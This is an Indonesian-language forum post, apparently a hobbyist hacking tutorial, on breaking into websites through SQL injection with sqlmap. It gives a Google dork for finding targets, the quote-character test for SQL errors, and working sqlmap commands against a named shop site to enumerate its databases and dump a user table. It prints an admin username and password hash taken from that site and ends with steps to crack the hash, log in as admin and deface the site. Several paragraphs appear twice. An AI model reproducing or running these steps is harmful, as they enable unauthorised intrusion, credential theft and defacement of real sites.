ok mlm nih sobat UN
sorry jrang Post, Maklum Pengangguran yg cari makan Lewat Adfly :p
kali ini ane post tentang Hacking Site with Python27 Sqlmap :)
gk usah pake lama Download aja bahan bahan nya di bawah broo :D
sorry jrang Post, Maklum Pengangguran yg cari makan Lewat Adfly :p
kali ini ane post tentang Hacking Site with Python27 Sqlmap :)
gk usah pake lama Download aja bahan bahan nya di bawah broo :D
========================================================
Dork : inurl:/.php?*id= [ bisa juga edit dork sesuka anda ] + [ cari Lewat Mbah Google Ya sob ]
Simak di bawah
========================================================
Untuk mengetahui website yang kalian mau Inject itu Vuln atau tidak , silahkan kasih tanda ( ' ) di akhir url target, contoh : http://vana-shop.com/product.php?c=1 saya tambahin ' menjadi http://vana-shop.com/product.php?c=1' , nah kalo vuln nanti ada tulisan "you have an erro ...." mysql error dan sebagainya" sekarang waktunya di hajar kalo udah ketemu web yang vuln :P
1. Setelah instal python, sekarang kalian extrack SQLMAPnya di Drive C:, setelah di extrack buka CMD lalu ketikan : cd\sqlmap\ , maka hasilnya akan seperti ini :
2. Stelah itu, kalian mulailah scan website target dengan perintah :
sqlmap.py -u http://www.BUGWEBTARGET.com --dbs
Contoh Target : sqlmap.py -u http://vana-shop.com/product.php?c=1 --dbs , klik [ENTER]
3. Tuh kan keliatan DATABASE nya :D , sekarang waktunya kita scan dengan perintah :
sqlmap.py -u http://TARGET.com -D nama_database -tables
Contoh Target : sqlmap.py -u http://vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables , maka hasilnya akan seperti ini :
4. Nah keliatan kan Table di databasenya ? nah sekarang kita scan table tersebut (*cari yang menurut kalian terdapat info tentang user dan pass website) kalo udah yakin disana ada infonya, ketikan perintah :
sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns
Contoh Target : sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --columns , tekan enter maka hasilnya akan seperti ini :
5. Nah setelah keliatan Tabelnya sekarang kita ketikan perintah :
sqlmap.py -u http://www.target.com -D nama_database -T nama_table --dump
Contoh Target : sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --dump , klik enter
Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip" :
do you want to crack them via a dictionary-based attack? [Y/n/q]
Maka Hasilnya akan seperti ini :
nah itu kita dapetin User + Passwordnya :D
User : admin
Pass : dfc560ef836a9a63c2bdbfb24a683624
Nah gimana tuh passwordnya kok aneh ? sekarang tugas kalian pecahin itu md5nya caranya pake havij pro juga bisa ko :)
nah liat klo dah ktemu password nya tinggal cari admin login pake havij pro bisa ko
kalo udah ktemu admin login nya tinggal masukin user sama password nya
Tinggal Tebass INDEX nya,, jangan lupa ya tebas nya jangan KEJAM KEJAM OM kasih Backup nya :D
nah liat klo dah ktemu password nya tinggal cari admin login pake havij pro bisa ko
kalo udah ktemu admin login nya tinggal masukin user sama password nya
Tinggal Tebass INDEX nya,, jangan lupa ya tebas nya jangan KEJAM KEJAM OM kasih Backup nya :D
Hasil deface
kalo ada yang mau di tanya Comen aja atau gk PM aja di sini
